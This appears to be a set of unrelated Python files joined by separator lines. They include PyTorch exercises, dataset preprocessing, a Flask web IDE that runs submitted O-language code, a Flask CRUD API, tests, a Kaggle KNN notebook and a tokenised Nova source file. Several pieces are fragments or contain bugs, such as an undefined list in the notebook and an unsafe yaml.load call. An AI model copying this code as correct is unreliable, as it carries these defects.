use_components = np.arange(use_components)
forecasted = vmssa_recurrent_forecast(
timepoints_out,
self.components_,
self.left_singular_vectors_,
self.P_,
self.L_,
use_components=use_components
)
if timeseries_indices is not None:
timeseries_indices = np.atleast_1d(timeseries_indices)
forecasted = forecasted[timeseries_indices, :]
return forecasted
|
#!/usr/bin/env python
# coding: utf-8
import torch
import time
def exo1():
dalle_step = 5
dalle_nb = 3
matrix_size = dalle_step * dalle_nb + 3
x = torch.full([matrix_size, matrix_size], 1)
twos_line = torch.empty(0).set_(x.storage(),
storage_offset=matrix_size,
size=(dalle_nb+1, matrix_size),
stride=(dalle_step * matrix_size, 1))
twos_line.fill_(2)
twos_column = torch.empty(0).set_(x.storage(),
storage_offset=1,
size=(matrix_size, dalle_nb+1),
stride=(matrix_size, dalle_step))
twos_column.fill_(2)
threes_matrices = torch.empty(0).set_(x.storage(),
storage_offset=(int((dalle_step + 1)/2)) * (1 + matrix_size),
size=(dalle_nb, dalle_nb, 2, 2),
stride=(matrix_size*dalle_step, dalle_step, matrix_size, 1))
threes_matrices.fill_(3)
print(x)
def exo2():
m = torch.empty(20, 20)
m.normal_()
d = torch.diag(torch.FloatTensor(range(1, 21)))
print(m)
print(d)
eigs = torch.eig(torch.inverse(m) @ d @ m)
print(eigs)
def exo3():
size = 5000
m1 = torch.empty([size, size]).normal_()
m2 = torch.empty([size, size]).normal_()
nb_ops_mul = size**3
t1 = time.perf_counter()
res = torch.mm(m1, m2)
t2 = time.perf_counter()
print("GigaFlops: {}".format(nb_ops_mul/((t2-t1) * 10**9)))
return res
def mul_row(t):
assert len(t.size()) == 2
r = torch.empty(t.size())
for i in range(t.size(0)):
for j in range(t.size(1)):
r[i][j] = t[i][j] * (i+1)
return r
def mul_row_fast(t):
assert len(t.size()) == 2
fact = torch.arange(1.0, t.size(0)+1).view(t.size(0), 1)
return fact * t
test_t = torch.empty(1000, 400).normal_()
t1 = time.perf_counter()
m1 = mul_row(test_t)
t2 = time.perf_counter()
m2 = mul_row_fast(test_t)
t3 = time.perf_counter()
print("Correctness: {}".format(torch.norm(m2-m1)))
print("T1 : {}, T2: {}, ratio: {}".format(t2 - t1, t3-t2, (t2-t1)/(t3-t2)))
|
from abc import ABC, abstractmethod
class AbstractEvaluationSuite(ABC):
@abstractmethod
def evaluate(self, predictions, truth):
raise NotImplementedError()
|
import struct
from newsroom import jsonl
import os
from utils import preprocess_text
import parameters as p
import pandas as pd
import pickle as pkl
from tensorflow.core.example import example_pb2
import argparse
def trim_and_transform(example_generator, new_filename, transformation, constraint):
oldcount, newcount = 0, 0
if os.path.isfile(new_filename):
os.remove(new_filename)
with jsonl.open(new_filename, gzip=True) as newfile:
for line in example_generator:
oldcount += 1
line = transformation(line)
if constraint(line):
newcount += 1
newfile.appendline(line)
if oldcount % 1000 == 0:
print(oldcount)
print('# of old lines: %i, # of new lines: %i' % (oldcount, newcount))
def newsroom_constraint(line):
return line['text'] is not None and line['summary'] is not None
def newsroom_preprocess(line):
text = preprocess_text(line['text']) if line['text'] is not None else None
summary = preprocess_text(line['summary']) if line['summary'] is not None else None
return dict(text=text, summary=summary)
# # TODO: clean this up
# def cnn_preprocess(example_str):
# abstract = []
# article = []
# in_abstract = False
# in_article = False
# example_str = example_str.decode('utf-8', 'replace')
# example_str = example_str.replace('<s>', ' ')
# example_str = example_str.replace('</s>', ' . ')
# prev_c = None
# for c in example_str.split():
# if c == '.' and prev_c == c:
# continue
# if 'abstract' in c and c != 'abstract':
# in_abstract = True
# in_article = False
# continue
# if 'article' in c and c != 'article':
# in_abstract = False
# in_article = True
# continue
# c = c.replace('</s>', '.')
# if '<s>' in c: continue
# if '�' in c: continue
# if in_abstract:
# abstract.append(c)
# if in_article:
# article.append(c)
# prev_c = c
# pdb.set_trace()
# return dict(text=article, summary=abstract)
def cnn_preprocess(example_str):
# convert to tensorflow example e
e = example_pb2.Example.FromString(example_str)
# extract text and summary
try:
# the article text was saved under the key 'article' in the data files
article_text = e.features.feature['article'].bytes_list.value[0].decode().split(' ')
# the abstract text was saved under the key 'abstract' in the data files
abstract_text = e.features.feature['abstract'].bytes_list.value[0].decode().split(' ')
except ValueError:
article_text = abstract_text = None
return dict(text=article_text, summary=abstract_text)
def cnn_constraint(line):
return line['text'] is not None and line['summary'] is not None
def pico_preprocess(line):
line = dict(text=line.abstract, P=line.population, I=line.intervention, O=line.outcome)
if pico_constraint(line):
return {k:preprocess_text(v) for k,v in line.items()}
else:
return line
def pico_constraint(line):
return line['text'] == line['text'] and \
line['P'] == line['P'] and \
line['I'] == line['I'] and \
line['O'] == line['O']
def preprocess_newsroom_datafile(filename, new_filename):
with jsonl.open(filename, gzip=True) as oldfile:
trim_and_transform(oldfile, new_filename, newsroom_preprocess, newsroom_constraint)
def preprocess_cnn_datafile(filename, new_filename):
def cnn_dataset_generator():
with open(filename, "rb") as file:
while True:
len_bytes = file.read(8)
if not len_bytes: break # finished reading this file
str_len = struct.unpack('q', len_bytes)[0]
example_str = struct.unpack('%ds' % str_len, file.read(str_len))[0]
yield example_str
trim_and_transform(cnn_dataset_generator(), new_filename, cnn_preprocess, cnn_constraint)
def preprocess_pico_dataset(filename, new_filename_train, new_filename_dev, new_filename_test, aspect_file):
df = pd.read_csv(filename)
def train_generator():
for i,row in df[:30000].iterrows():
yield row
def dev_generator():
for i,row in df[30000:40000].iterrows():
yield row
def test_generator():
for i,row in df[40000:].iterrows():
yield row
trim_and_transform(train_generator(), new_filename_train, pico_preprocess, pico_constraint)
trim_and_transform(dev_generator(), new_filename_dev, pico_preprocess, pico_constraint)
trim_and_transform(test_generator(), new_filename_test, pico_preprocess, pico_constraint)
with open(aspect_file, 'w') as aspectfile:
aspectfile.write(str(['P','I','O']))
def preprocess_all_newsroom_dataset_files(folder):
preprocess_newsroom_datafile(
os.path.join(folder, 'train.data'),
os.path.join(folder, 'train_processed.data'))
preprocess_newsroom_datafile(
os.path.join(folder, 'val.data'),
os.path.join(folder, 'val_processed.data'))
preprocess_newsroom_datafile(
os.path.join(folder, 'test.data'),
os.path.join(folder, 'test_processed.data'))
def preprocess_all_cnn_dataset_files(folder):
preprocess_cnn_datafile(
os.path.join(folder, 'train.bin'),
os.path.join(folder, 'train_processed.data'))
preprocess_cnn_datafile(
os.path.join(folder, 'val.bin'),
os.path.join(folder, 'val_processed.data'))
preprocess_cnn_datafile(
os.path.join(folder, 'test.bin'),
os.path.join(folder, 'test_processed.data'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('dataset_type')
parser.add_argument('data_folder')
args = parser.parse_args()
if args.dataset_type == 'newsroom':
# for newsroom dataset
preprocess_all_newsroom_dataset_files(args.data_folder)
elif args.dataset_type == 'cnn':
# for cnn dataset
preprocess_all_cnn_dataset_files(args.data_folder)
else:
raise Exception
# IGNORE FOR NOW
# for pico dataset
# aspect_file = '/Volumes/JEREDUSB/aspects.txt'
# filename = '/Volumes/JEREDUSB/pico_cdsr.csv'
# new_filename_train = '/Volumes/JEREDUSB/train_processed.data'
# new_filename_dev = '/Volumes/JEREDUSB/dev_processed.data'
# new_filename_test = '/Volumes/JEREDUSB/test_processed.data'
# preprocess_pico_dataset(filename, new_filename_train, new_filename_dev, new_filename_test, aspect_file)
# with open(aspect_file, 'w') as aspectfile:
# aspectfile.write(str(['P','I','O']))
|
#!/usr/bin/env python
# NOTE: pass -d to this to print debugging info when the server crashes.
from flask import Flask, render_template, url_for, request
from subprocess import Popen, PIPE, check_call, check_output
import sys, os, string, glob, logging, pathlib
app = Flask(__name__)
app.logger.addHandler(logging.StreamHandler(sys.stdout))
app.logger.setLevel(logging.ERROR)
# Git commit hash for easy version checking
version = ""
if os.path.isfile("version.txt"):
with open("version.txt", "r") as f:
version = f.readline().strip()
else:
version = check_output(["git", "describe", "--tags", "--always"]).decode("utf-8")
def compileO():
r = check_call(['make', 'ide'])
print("o-ide: " + "".join(glob.glob("oide*")))
if r != 0:
print("o.c could not be compiled. Error: " + r)
raise RuntimeError("Could not compile O interpreter")
@app.route('/', methods=['GET', 'POST'])
def index():
url_for('static', filename='logo.ico')
if request.method == 'POST':
#Check files that start with 'o-ide*'
files = glob.glob("oide*")
print(files)
#Check if C was compiled
if len(files) < 1:
print("Compiling O...")
compileO()
#Run code
code = request.form['code']
input = request.form['input'].replace('\r\n', '\n')
if input is None: input = ""
print('Got code:', code, 'input:', input)
print('Running O code...')
p = Popen(['./oide', '-e', code], stdout=PIPE, stderr=PIPE, stdin=PIPE, universal_newlines=True)
output, error = p.communicate(input)
#Output to IDE
if p.returncode:
print('Output:', output, 'error:', error)
return render_template('error.html', version=version, code=code, input=input, error=error)
else:
print('Output:', output, 'stack:', error)
return render_template('code.html', version=version, code=code, input=input, output=output, stack=error or '[]')
else:
return render_template('primary.html', version=version)
@app.route('/link/')
@app.route('/link/<code>/')
@app.route('/link/<code>/<input>')
def link(code="IkVycm9yJTIwbGlua2luZyUyMGNvZGUibw==", input=""):
url_for('static', filename='logo.ico')
print('Link:', code, input)
return render_template('link.html', code=code, input=input)
if __name__ == '__main__':
print('Compiling O...')
compileO()
print('Starting server...')
app.run(port=80, debug='-d' in sys.argv[1:])
|
from .tidyup_pandas_df import OpenFace, Librosa, downsample
from .findwav import findwav
from .features2db import create_db, create_connection, check_db_content, add_features
from .fragments import *
from .openface_aggregation import *
|
'''
----------------------------------------------------------------------------
coco.py
- Coordinate Conversions
2020/21/22
Mike Alexandersen & Matthew Payne & Matthew Holman
This module provides functionalities to perform coordinate conversions / rotations / shifts of frame
----------------------------------------------------------------------------
'''
# Import third-party packages
# -----------------------------------------------------------------------------
import sys
import numpy as np
# Import neighbouring packages
# -----------------------------------------------------------------------------
# old conversion library
from . import MPC_library as mpc
from .cheby_checker import Base
# Coordinate Conversion Functions
# -----------------------------------------------------------------------------
def ecliptic_to_equatorial(input, backwards=False):
'''
Rotates a cartesian vector or Cov-Matrix from mean ecliptic to mean equatorial.
Backwards=True converts backwards, from equatorial to ecliptic.
inputs:
-------
input : 2-D or 3-D arrays
- If 2-D, then input.shape must be in (N_times,3) or (N_times,6)
- If 3-D, then input.shape must be (N_times,6,6)
NB: The inputs are 2D & 3D (rather than 1 or 2) so
that we can "stack" lots of 1D vectors, or 2D Covariance-matricees
output:
-------
output : np.ndarray
- same shape as input
'''
# Ensure we have an array
input = np.atleast_1d(input)
# The rotation matricees we may use
direction = -1 if backwards else +1
R3 = mpc.rotate_matrix(mpc.Constants.ecl * direction)
R6 = np.block( [ [R3, np.zeros((3,3))],[np.zeros((3,3)),R3] ])
# Vector input => Single rotation operation
# NB ... self.helio_ecl_vec.ndim ==2, self.helio_ecl_vec.shape = (N,6)
if input.ndim == 2 and input.shape[1] in [3,6]:
R = R6 if input.shape[1] == 6 else R3
output = R.dot(input.T).T
# Matrix (CoV) input => R & R.T
# NB: CoV.ndim ==3 , CoV.shape == (N,6,6)
# MJP 2022-02-6: Deliberately leaving as 6x6 to ensure Non-Gravs don't get passed in ...
elif input.ndim == 3 and input.shape[1:] == (6,6):
R = R6
output = R @ input @ R.T
# Unknown input
else:
sys.exit(f'Does not compute: input.ndim=={input.ndim} , input.shape={input.shape}')
assert output.shape == input.shape
return output
def equatorial_helio2bary(input_xyz, jd_tdb, backwards=False):
'''
Convert from heliocentric to barycentic cartesian coordinates.
backwards=True converts backwards, from bary to helio.
input:
input_xyz - np.ndarray of shape (N_times,3) or (N_times,6)
jd_tdb - np.ndarray of shape (N_times)
backwards - boolean
output:
output_xyz - np.ndarray
- same shape as input_xyz:
(N_times , 3) or (N_times , 6)
input_xyz MUST BE EQUATORIAL!!!
'''
direction = -1 if backwards else +1
# Ensure we have an array of the correct shape to work with
assert input_xyz.ndim == 2, f" input_xyz={input_xyz}\n input_xyz.shape={input_xyz.shape}\n input_xyz.ndim={input_xyz.ndim}"
assert input_xyz.shape[1] in [3,6]
# Position & Motion of the barycenter w.r.t. the heliocenter (and vice-versa)
# NB: delta.shape == (3,N_times) ==>> delta.T.shape == (N_times, 3)
# TODO: use jpl_kernel with a public call on an Observatory object
delta, delta_vel = mpc.jpl_kernel[0, 10].compute_and_differentiate(jd_tdb)
# Work out whether we need xyz or xyzuvw
delta = delta.T if input_xyz.shape[1] == 3 else np.block([delta.T,delta_vel.T])
# Shift vectors & return: result.shape == (N_times , 3) or (N_times , 6)
result = input_xyz + delta * direction / Base().au_km
return result
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
head = ListNode(-1)
retme = head
carry = 0
while l1 or l2:
val1 = 0 if not l1 else l1.val
val2 = 0 if not l2 else l2.val
sum_ = val1 + val2 + carry
carry = sum_ // 10
sum_ %= 10
head.next = ListNode(sum_)
head = head.next
if l1:
l1 = l1.next
if l2:
l2 = l2.next
if carry:
head.next = ListNode(1)
return retme.next
|
# Copyright 2021 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Tests for pw_console.console_app"""
import inspect
import logging
import unittest
from unittest.mock import MagicMock
from jinja2 import Environment, PackageLoader, make_logging_undefined
from prompt_toolkit.key_binding import KeyBindings
from pw_console.help_window import HelpWindow
_jinja_env = Environment(
loader=PackageLoader('pw_console'),
undefined=make_logging_undefined(logger=logging.getLogger('pw_console')),
trim_blocks=True,
lstrip_blocks=True,
)
def _create_app_mock():
template = _jinja_env.get_template('keybind_list.jinja')
mock_app = MagicMock()
mock_app.get_template = MagicMock(return_value=template)
return mock_app
class TestHelpWindow(unittest.TestCase):
"""Tests for HelpWindow text and keybind lists."""
def setUp(self):
self.maxDiff = None # pylint: disable=invalid-name
def test_instantiate(self) -> None:
app = _create_app_mock()
help_window = HelpWindow(app)
self.assertIsNotNone(help_window)
# pylint: disable=unused-variable,unused-argument
def test_add_keybind_help_text(self) -> None:
bindings = KeyBindings()
@bindings.add('f1')
def show_help(event):
"""Toggle help window."""
@bindings.add('c-w')
@bindings.add('c-q')
def exit_(event):
"""Quit the application."""
app = _create_app_mock()
help_window = HelpWindow(app)
help_window.add_keybind_help_text('Global', bindings)
self.assertEqual(
help_window.help_text_sections,
{
'Global': {
'Quit the application.': ['Ctrl-Q', 'Ctrl-W'],
'Toggle help window.': ['F1'],
}
},
)
def test_generate_help_text(self) -> None:
"""Test keybind list template generation."""
global_bindings = KeyBindings()
@global_bindings.add('f1')
def show_help(event):
"""Toggle help window."""
@global_bindings.add('c-w')
@global_bindings.add('c-q')
def exit_(event):
"""Quit the application."""
focus_bindings = KeyBindings()
@focus_bindings.add('s-tab')
@focus_bindings.add('c-right')
@focus_bindings.add('c-down')
def app_focus_next(event):
"""Move focus to the next widget."""
@focus_bindings.add('c-left')
@focus_bindings.add('c-up')
def app_focus_previous(event):
"""Move focus to the previous widget."""
app = _create_app_mock()
help_window = HelpWindow(
app,
preamble='Pigweed CLI v0.1',
additional_help_text=inspect.cleandoc("""
Welcome to the Pigweed Console!
Please enjoy this extra help text.
"""),
)
help_window.add_keybind_help_text('Global', global_bindings)
help_window.add_keybind_help_text('Focus', focus_bindings)
help_window.generate_help_text()
self.assertIn(
inspect.cleandoc("""
Pigweed CLI v0.1
================================ Help ===============================
Welcome to the Pigweed Console!
Please enjoy this extra help text.
"""),
help_window.help_text,
)
self.assertIn(
inspect.cleandoc("""
============================ Global Keys ============================
"""),
help_window.help_text,
)
self.assertIn(
inspect.cleandoc("""
Toggle help window. ----------------- F1
Quit the application. --------------- Ctrl-Q, Ctrl-W
"""),
help_window.help_text,
)
self.assertIn(
inspect.cleandoc("""
============================= Focus Keys ============================
"""),
help_window.help_text,
)
self.assertIn(
inspect.cleandoc("""
Move focus to the next widget. ------ BackTab, Ctrl-Down, Ctrl-Right
Move focus to the previous widget. -- Ctrl-Left, Ctrl-Up
"""),
help_window.help_text,
)
if __name__ == '__main__':
unittest.main()
|
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
import pandas as pd
import numpy as np
import os
from numba import jit, cuda
os.getcwd()
train = train=pd.read_csv("/kaggle/input/liverpool-ion-switching/train.csv")
train.shape
train.head()
test = pd.read_csv('/kaggle/input/liverpool-ion-switching/test.csv')
test.shape
test.head()
test['time'] = (test['time'] - 500).round(4)
test.head()
train['signal'].describe()
def add_batch(data, batch_size):
c = 'batch_' + str(batch_size)
data[c] = 0
ci = data.columns.get_loc(c)
n = int(data.shape[0] / batch_size)
print('Batch size:', batch_size, 'Column name:', c, 'Number of batches:', n)
for i in range(0, n):
data.iloc[i * batch_size: batch_size * (i + 1), ci] = i
for batch_size in [500000, 400000, 200000,100000]:
add_batch(train, batch_size)
add_batch(test, batch_size)
train.head()
original_batch_column = 'batch_500000'
batch_columns = [c for c in train.columns if c.startswith('batch')]
batch_columns
batch_6 = train[train[original_batch_column] == 6]
def add_shifted_signal(data, shift):
for batch in data[original_batch_column].unique():
m = data[original_batch_column] == batch
new_feature = 'shifted_signal_'
if shift > 0:
shifted_signal = np.concatenate((np.zeros(shift), data.loc[m, 'signal'].values[:-shift]))
new_feature += str(shift)
else:
t = -shift
shifted_signal = np.concatenate((data.loc[m, 'signal'].values[t:], np.zeros(t)))
new_feature += 'minus_' + str(t)
data.loc[m, new_feature] = shifted_signal
add_shifted_signal(train, -1)
add_shifted_signal(test, -1)
add_shifted_signal(train, 1)
add_shifted_signal(test, 1)
train.head()
y_train = train['open_channels'].copy()
x_train = train.drop(['time', 'open_channels'] + batch_columns, axis=1)
x_test = test.drop(['time'] + batch_columns, axis=1)
list(x_train.columns)
del train
del test
set(x_train.columns) ^ set(x_test.columns)
set()
from sklearn.preprocessing import StandardScaler
x_train = x_train.values
x_test = x_test.values
#KNN
from sklearn.model_selection import train_test_split
X_train, X_test, Y_train, Y_test = train_test_split(x_train,y_train,test_size=0.20)
from sklearn.neighbors import KNeighborsRegressor
# Will take some time
for i in range(1,20):
print('training for k=',i)
knn = KNeighborsRegressor(n_neighbors=i,weights='uniform', algorithm='auto', leaf_size=30, p=2, metric='minkowski')
knn.fit(X_train,Y_train)
pred_i = knn.predict(X_test)
error_rate.append(np.mean(pred_i-Y_test)**2)
#Model Building and predictions
knn = KNeighborsRegressor(n_neighbors=4,weights='uniform', algorithm='auto', leaf_size=30, p=2, metric='minkowski')
knn.fit(X_train,Y_train)
pred_i = knn.predict(x_test)
y_pred = np.round(pred_i)
submission = pd.read_csv('/kaggle/input/liverpool-ion-switching/sample_submission.csv')
submission['open_channels'] = pd.Series(y_pred, dtype='int32')
submission['open_channels']=submission['open_channels'].astype('int')
submission.to_csv('submission_knn04.csv', index=False, float_format='%.4f')
submission.head()
|
"""Example module that will be deleted in the future
This file demonstates proper coding conventions along with how to
document your functions and classes. The docstring format that we are
using is numpy docstrings
https://sphinxcontrib-napoleon.readthedocs.io/en/latest/example_numpy.html
"""
def do_work_sum(a, b):
"""Add the sum of two variables
Parameters
----------
a: int
first integer as input
b: int
second integer as input
Returns
-------
int
sum of a and b
Example
-------
Examples should be written in doctest format, and should
illustrate how to use the function.
>>> print(do_work_sum(1, 3))
4
"""
return a + b
class FooBar:
"""Essential to the opperation of the example class
The __init__ method should be documented in either the class level
docstring.
Note
----
Do not include the `self` parameter in the ``Parameters`` section.
Parameters
----------
biz: str
special string to start sentences with
baz: str
special string to end sentences with
"""
def __init__(self, biz, baz):
self.biz = biz
self.baz = baz
def hello_world(self):
"""Print hello world message with biz baz addition"""
return self.biz + " Hello World! " + self.baz
|
from django.utils.translation import ugettext_lazy as _
from grappelli.dashboard import modules, Dashboard
class CustomIndexDashboard(Dashboard):
def __init__(self, **kwargs):
Dashboard.__init__(self, **kwargs)
self.children.extend([
modules.ModelList(
title=_('People and organizations'),
column=1,
models=[
'academic.people.*',
'academic.organizations.*',],
),
modules.ModelList(
title=_('Publishing'),
column=1,
models=['academic.publishing.*',],
),
modules.ModelList(
title=_('Projects'),
column=1,
models=('academic.projects.*',),
),
modules.LinkList(
title=_('Media Management'),
column=2,
children=[
{
'title': _('Browse and upload files'),
'url': '/admin/filebrowser/browse/',
'external': False,
},
]
),
modules.ModelList(
title=_('Content and pages'),
column=1,
models=[
'academic.content.*',
'django.contrib.flatpages.*',
'flatcontent.*'],
),
modules.ModelList(
title=_('Administration'),
column=2,
models=[
'django.contrib.auth.*',
'django.contrib.sites.*'],
),
modules.Feed(
title=_(''),
column=3,
feed_url='http://www.djangoproject.com/rss/weblog/',
limit=5,
),
modules.RecentActions(
title='Recent actions',
column=2,
limit=5
),
])
|
from flask import Flask, render_template, request, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
import logging
import yaml
app = Flask(__name__)
log = logging.getLogger('werkzeug')
log.disabled=True
log.setLevel(logging.ERROR)
db_config = yaml.load(open('database.yaml'))
app.config['SQLALCHEMY_DATABASE_URI'] = db_config['uri']
db = SQLAlchemy(app)
CORS(app)
class Cliente(db.Model):
__tablename__ = "ClientePython"
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.String(255))
endereco = db.Column(db.String(255))
cpf = db.Column(db.String(255))
def __init__(self, nome, endereco, cpf):
self.nome = nome
self.endereco = endereco
self.cpf = cpf
def __repr__(self):
return '%s/%s/%s/%s' % (self.id, self.nome, self.endereco, self.cpf)
@app.route('/api/Clientes', methods=['POST', 'GET'])
def data():
if request.method == 'POST':
body = request.json
nome = body['nome']
endereco = body['endereco']
cpf = body['cpf']
data = Cliente(nome, endereco, cpf)
db.session.add(data)
db.session.commit()
return jsonify({
'status': 'Cliente foi inserido!',
'nome': nome,
'endereco': endereco,
'cpf': cpf
})
if request.method == 'GET':
data = Cliente.query.order_by(Cliente.id).all()
dataJson = []
for i in range(len(data)):
dataDict = {
'id': str(data[i]).split('/')[0],
'nome': str(data[i]).split('/')[1],
'endereco': str(data[i]).split('/')[2],
'cpf': str(data[i]).split('/')[3]
}
dataJson.append(dataDict)
return jsonify(dataJson)
@app.route('/cliente/<string:id>', methods=['GET', 'DELETE', 'PUT'])
def onedata(id):
if request.method == 'GET':
data = Cliente.query.get(id)
dataDict = {
'id': str(data).split('/')[0],
'nome': str(data).split('/')[1],
'endereco': str(data).split('/')[2],
'cpf': str(data).split('/')[3]
}
return jsonify(dataDict)
if request.method == 'DELETE':
delData = Cliente.query.filter_by(id=id).first()
db.session.delete(delData)
db.session.commit()
return jsonify({'status': 'Cliente '+id+' foi excluido!'})
if request.method == 'PUT':
body = request.json
newNome = body['nome']
newEndereco = body['endereco']
newCpf = body['cpf']
editData = Cliente.query.filter_by(id=id).first()
editData.nome = newNome
editData.endereco = newEndereco
editData.cpf = newCpf
db.session.commit()
return jsonify({'status': 'Cliente '+id+' foi atualizado!'})
@app.route('/')
def hello():
return "Hello World!"
@app.route('/ping')
def ping():
return "Pong"
if __name__ == '__main__':
import os
HOST = os.environ.get('SERVER_HOST', 'localhost')
try:
PORT = int(os.environ.get('SERVER_PORT', '5555'))
except ValueError:
PORT = 5555
app.run(HOST, PORT, debug=False, threaded=True, use_debugger=False)
|
from enum import Flag
class AstronomyEventType(Flag):
Rise = 1
Set = 1 << 1
|
class DummyTracer(object):
def __init__(self, with_subtracer=False):
super(DummyTracer, self).__init__()
if with_subtracer:
self._tracer = object()
self.spans = []
def clear(self):
self.spans = []
def start_span(self, operation_name, child_of=None):
span = DummySpan(operation_name, child_of=child_of)
self.spans.append(span)
return span
class DummySpan(object):
def __init__(self, operation_name='span', child_of=None):
super(DummySpan, self).__init__()
self.operation_name = operation_name
self.child_of = child_of
self.tags = {}
self.is_finished = False
def set_tag(self, name, value):
self.tags[name] = value
def finish(self):
self.is_finished = True
|
begin_unit
comment|'# Copyright (C) 2014, Red Hat, Inc.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'versionutils'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'db'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'objects'
name|'import'
name|'base'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'objects'
name|'import'
name|'fields'
newline|'\n'
nl|'\n'
nl|'\n'
op|'@'
name|'base'
op|'.'
name|'NovaObjectRegistry'
op|'.'
name|'register'
newline|'\n'
DECL|class|VirtualInterface
name|'class'
name|'VirtualInterface'
op|'('
name|'base'
op|'.'
name|'NovaPersistentObject'
op|','
name|'base'
op|'.'
name|'NovaObject'
op|')'
op|':'
newline|'\n'
comment|'# Version 1.0: Initial version'
nl|'\n'
comment|'# Version 1.1: Add tag field'
nl|'\n'
DECL|variable|VERSION
indent|' '
name|'VERSION'
op|'='
string|"'1.1'"
newline|'\n'
nl|'\n'
DECL|variable|fields
name|'fields'
op|'='
op|'{'
nl|'\n'
string|"'id'"
op|':'
name|'fields'
op|'.'
name|'IntegerField'
op|'('
op|')'
op|','
nl|'\n'
string|"'address'"
op|':'
name|'fields'
op|'.'
name|'StringField'
op|'('
name|'nullable'
op|'='
name|'True'
op|')'
op|','
nl|'\n'
string|"'network_id'"
op|':'
name|'fields'
op|'.'
name|'IntegerField'
op|'('
op|')'
op|','
nl|'\n'
string|"'instance_uuid'"
op|':'
name|'fields'
op|'.'
name|'UUIDField'
op|'('
op|')'
op|','
nl|'\n'
string|"'uuid'"
op|':'
name|'fields'
op|'.'
name|'UUIDField'
op|'('
op|')'
op|','
nl|'\n'
string|"'tag'"
op|':'
name|'fields'
op|'.'
name|'StringField'
op|'('
name|'nullable'
op|'='
name|'True'
op|')'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
DECL|member|obj_make_compatible
name|'def'
name|'obj_make_compatible'
op|'('
name|'self'
op|','
name|'primitive'
op|','
name|'target_version'
op|')'
op|':'
newline|'\n'
indent|' '
name|'target_version'
op|'='
name|'versionutils'
op|'.'
name|'convert_version_to_tuple'
op|'('
name|'target_version'
op|')'
newline|'\n'
name|'if'
name|'target_version'
op|'<'
op|'('
number|'1'
op|','
number|'1'
op|')'
name|'and'
string|"'tag'"
name|'in'
name|'primitive'
op|':'
newline|'\n'
indent|' '
name|'del'
name|'primitive'
op|'['
string|"'tag'"
op|']'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'staticmethod'
newline|'\n'
DECL|member|_from_db_object
name|'def'
name|'_from_db_object'
op|'('
name|'context'
op|','
name|'vif'
op|','
name|'db_vif'
op|')'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'field'
name|'in'
name|'vif'
op|'.'
name|'fields'
op|':'
newline|'\n'
indent|' '
name|'setattr'
op|'('
name|'vif'
op|','
name|'field'
op|','
name|'db_vif'
op|'['
name|'field'
op|']'
op|')'
newline|'\n'
dedent|''
name|'vif'
op|'.'
name|'_context'
op|'='
name|'context'
newline|'\n'
name|'vif'
op|'.'
name|'obj_reset_changes'
op|'('
op|')'
newline|'\n'
name|'return'
name|'vif'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_by_id
name|'def'
name|'get_by_id'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'vif_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vif'
op|'='
name|'db'
op|'.'
name|'virtual_interface_get'
op|'('
name|'context'
op|','
name|'vif_id'
op|')'
newline|'\n'
name|'if'
name|'db_vif'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'cls'
op|'.'
name|'_from_db_object'
op|'('
name|'context'
op|','
name|'cls'
op|'('
op|')'
op|','
name|'db_vif'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_by_uuid
name|'def'
name|'get_by_uuid'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'vif_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vif'
op|'='
name|'db'
op|'.'
name|'virtual_interface_get_by_uuid'
op|'('
name|'context'
op|','
name|'vif_uuid'
op|')'
newline|'\n'
name|'if'
name|'db_vif'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'cls'
op|'.'
name|'_from_db_object'
op|'('
name|'context'
op|','
name|'cls'
op|'('
op|')'
op|','
name|'db_vif'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
